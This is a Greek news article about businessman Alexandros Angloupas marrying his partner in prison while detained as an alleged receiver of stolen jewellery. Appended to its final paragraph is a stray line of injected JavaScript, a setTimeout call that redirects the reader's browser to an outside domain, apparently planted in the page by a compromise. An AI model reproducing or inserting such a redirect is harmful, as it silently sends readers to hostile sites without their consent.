Ο Αλέξανδρος Αγγλούπας παντρεύτηκε τη σύντροφό του μέσα στη φυλακή

0
396

Ο Αλέξανδρος Αγγλούπας παντρεύτηκε σήμερα μέσα στη φυλακή την αγαπημένη του σύντροφο Όλγα Ζαπουνίδου, υπεύθυνη πωλήσεων στην εταιρία με γυναικεία ενδύματα που ανήκει στην οικογένειά του  Ο γνωστός επιχειρηματίας και μπον βιβέρ αποφάσισε να προχωρήσει στην κίνηση αυτή, παρότι από την περασμένη εβδομάδα είναι προφυλακισμένος ως κλεπταποδόχος της σπείρας των τσιγγάνων που είχαν ξαφρίσει τα βόρεια προάστια.

Οι δυο τους είναι μαζί αρκετό καιρό. Από συνεργάτες, έγιναν φίλοι και, τελικά, ζευγάρι. Η Όλγα στάθηκε στο πλευρό του σε όλα τη διάρκεια της περιπέτειάς του -στη σύλληψη, την απολογία και την προφυλάκιση.

Image result for αγγλουπας ζαπουνιδου

Υπενθυμίζεται ότι η αστυνομία έχει στην κατοχή της υποκλαπείσες τηλεφωνικές συνομιλίες του με ηγετικά στελέχη του κυκλώματος των Ρομά. Σε αυτές αποκαλύπτεται ότι έκανε εκτίμηση της αξίας κλεμμένων διαμαντιών και πανάκριβων ρολογιών, στη συνέχεια τα αγόραζε και τα μεταπωλούσε σε κεντρικά κοσμηματοπωλεία του Κολωνακίου, βγάζοντας κέρδος πάνω από 20%.

Στην απολογία του δεν αρνήθηκε τις επαφές με τους τσιγγάνους, υποατήριξε όμως πως δεν γνώριζε την προέλευση των πολύτιμων λίθων και των κοσμημάτων. Ζήτησε δε να μην προφυλακιστεί, αλλά να μείνει ελεύθερος με ηλεκτρονικό βραχιολάκι. Ωστόσο, ανακριτής και ισαγγελές του είπαν «όχι» και τον έστειλαν στη φυλακή. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here